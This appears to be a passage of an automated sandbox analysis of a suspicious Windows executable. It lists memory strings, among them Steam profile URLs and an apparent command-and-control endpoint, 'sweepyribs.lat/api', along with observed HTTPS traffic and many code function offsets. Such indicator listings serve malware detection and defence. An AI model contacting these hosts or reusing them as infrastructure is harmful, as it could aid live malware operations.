      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.co
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steam
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.c
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: mgEXk8ip26.exe, 00000001.00000003.2232015286.0000000001455000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/st
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260488098.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat:443/api
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: mgEXk8ip26.exe, 00000001.00000003.2231994519.000000000145E000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231708909.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001421000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231875437.0000000001420000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.0000000001421000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49718 version: TLS 1.2

      System Summary

      barindex
      PE file contains section with special chars
      Source: mgEXk8ip26.exeStatic PE information: section name:
      Source: mgEXk8ip26.exeStatic PE information: section name: .idata
      Source: mgEXk8ip26.exeStatic PE information: section name:
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009C88501_2_009C8850
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009CACF01_2_009CACF0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A2A0A31_2_00A2A0A3
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF00A81_2_00AF00A8
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A9A0BE1_2_00A9A0BE
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B360AF1_2_00B360AF
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ADA0801_2_00ADA080
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A220941_2_00A22094
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B120F61_2_00B120F6
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A640F71_2_00A640F7
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A3E0F11_2_00A3E0F1
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ACA0F61_2_00ACA0F6
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AE00F31_2_00AE00F3
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B2C0331_2_00B2C033
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B080321_2_00B08032
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A3A0281_2_00A3A028
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A6003C1_2_00A6003C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A7603A1_2_00A7603A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5E0091_2_00A5E009
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A9401B1_2_00A9401B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ACC01E1_2_00ACC01E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A6C06A1_2_00A6C06A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B0E0621_2_00B0E062
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A280711_2_00A28071
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AEC0491_2_00AEC049
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF60421_2_00AF6042
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B240461_2_00B24046
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AC81A41_2_00AC81A4
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009E21901_2_009E2190
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B3E1A41_2_00B3E1A4
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A261811_2_00A26181
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B241981_2_00B24198
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A421881_2_00A42188
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5219E1_2_00A5219E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B0C1E31_2_00B0C1E3
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B041E61_2_00B041E6
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009E41C01_2_009E41C0
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AA41F41_2_00AA41F4
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ABC1CF1_2_00ABC1CF
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ADC1C61_2_00ADC1C6
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AA21DF1_2_00AA21DF
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A201211_2_00A20121
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AD612A1_2_00AD612A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A981091_2_00A98109
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AB01091_2_00AB0109
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B1A11F1_2_00B1A11F
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AC211A1_2_00AC211A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A341181_2_00A34118
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A9416E1_2_00A9416E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AD816A1_2_00AD816A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A661681_2_00A66168
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A481741_2_00A48174
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A821701_2_00A82170
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A561791_2_00A56179
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AFC14E1_2_00AFC14E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A701571_2_00A70157
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B3214B1_2_00B3214B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A15E1_2_00A5A15E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A801551_2_00A80155
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009DE2901_2_009DE290
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009C62801_2_009C6280
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B1A2931_2_00B1A293
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ACE2881_2_00ACE288
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A7C28D1_2_00A7C28D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A362931_2_00A36293
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A602931_2_00A60293
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A6829E1_2_00A6829E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A4E29E1_2_00A4E29E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A8E2EB1_2_00A8E2EB
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AB22E81_2_00AB22E8
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A662FC1_2_00A662FC
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AE82F41_2_00AE82F4
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AE42F11_2_00AE42F1
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A242C11_2_00A242C1
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B302DA1_2_00B302DA
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF82D21_2_00AF82D2
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AAA22A1_2_00AAA22A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A6620A1_2_00A6620A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5C21D1_2_00A5C21D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AA02101_2_00AA0210
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AEA26E1_2_00AEA26E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B262711_2_00B26271
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AD02681_2_00AD0268
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ABA26D1_2_00ABA26D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A3026B1_2_00A3026B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009D62631_2_009D6263
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A383B51_2_00A383B5
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B023AA1_2_00B023AA
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009E43801_2_009E4380
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B3E3931_2_00B3E393
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF63981_2_00AF6398
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A2A3ED1_2_00A2A3ED
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009EC3FC1_2_009EC3FC
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B143DE1_2_00B143DE
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A723D51_2_00A723D5
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B3A3CD1_2_00B3A3CD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B1E3381_2_00B1E338
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B0433C1_2_00B0433C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ACC3211_2_00ACC321
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ABA3251_2_00ABA325
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AA833B1_2_00AA833B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009E830D1_2_009E830D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B4232D1_2_00B4232D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A9E3331_2_00A9E333
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009EA33F1_2_009EA33F
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A6A3001_2_00A6A300
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A7430F1_2_00A7430F
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A6E30C1_2_00A6E30C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009C83301_2_009C8330
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ADE3141_2_00ADE314
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009C43201_2_009C4320
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AB63171_2_00AB6317
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B063741_2_00B06374
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B223621_2_00B22362
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B0C36F1_2_00B0C36F
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AEC34E1_2_00AEC34E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A9234A1_2_00A9234A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5E4A71_2_00A5E4A7
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ACE4A81_2_00ACE4A8
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B2E4AB1_2_00B2E4AB
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AEE4B41_2_00AEE4B4
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AAC4B61_2_00AAC4B6
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A224801_2_00A22480
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF44861_2_00AF4486
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B2A48B1_2_00B2A48B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ACA4FC1_2_00ACA4FC
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A8A4FD1_2_00A8A4FD
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AD64F51_2_00AD64F5
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A3E4DC1_2_00A3E4DC
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ABE4D41_2_00ABE4D4
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A8C4291_2_00A8C429
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A764231_2_00A76423
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B1643D1_2_00B1643D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AC043C1_2_00AC043C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A504301_2_00A50430
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A8E4341_2_00A8E434
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A284061_2_00A28406
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AFE4091_2_00AFE409
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A704001_2_00A70400
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A244111_2_00A24411
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ADA4191_2_00ADA419
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A404611_2_00A40461
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AD24631_2_00AD2463
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AA647D1_2_00AA647D
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A2C47E1_2_00A2C47E
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AC645C1_2_00AC645C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A444551_2_00A44455
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AE04511_2_00AE0451
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A3C5A71_2_00A3C5A7
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A765A81_2_00A765A8
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A945851_2_00A94585
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A9C5991_2_00A9C599
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF05941_2_00AF0594
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF85EF1_2_00AF85EF
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AAA5EB1_2_00AAA5EB
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AB85E31_2_00AB85E3
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B0A5E51_2_00B0A5E5
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A405F31_2_00A405F3
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B2C5E51_2_00B2C5E5
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AC25F31_2_00AC25F3
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B365CE1_2_00B365CE
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009E25101_2_009E2510
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF253C1_2_00AF253C
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A4A5331_2_00A4A533
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AD05331_2_00AD0533
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A565031_2_00A56503
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AFA51B1_2_00AFA51B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ABC56B1_2_00ABC56B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00B205711_2_00B20571
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AE256B1_2_00AE256B
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A845611_2_00A84561
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AAE5631_2_00AAE563
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5A5501_2_00A5A550
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A686A21_2_00A686A2
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A7C6AF1_2_00A7C6AF
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A5C6B11_2_00A5C6B1
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00ADE6B91_2_00ADE6B9
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AE86B81_2_00AE86B8
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A3468A1_2_00A3468A
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00AF66821_2_00AF6682
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A7E6971_2_00A7E697
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A366981_2_00A36698
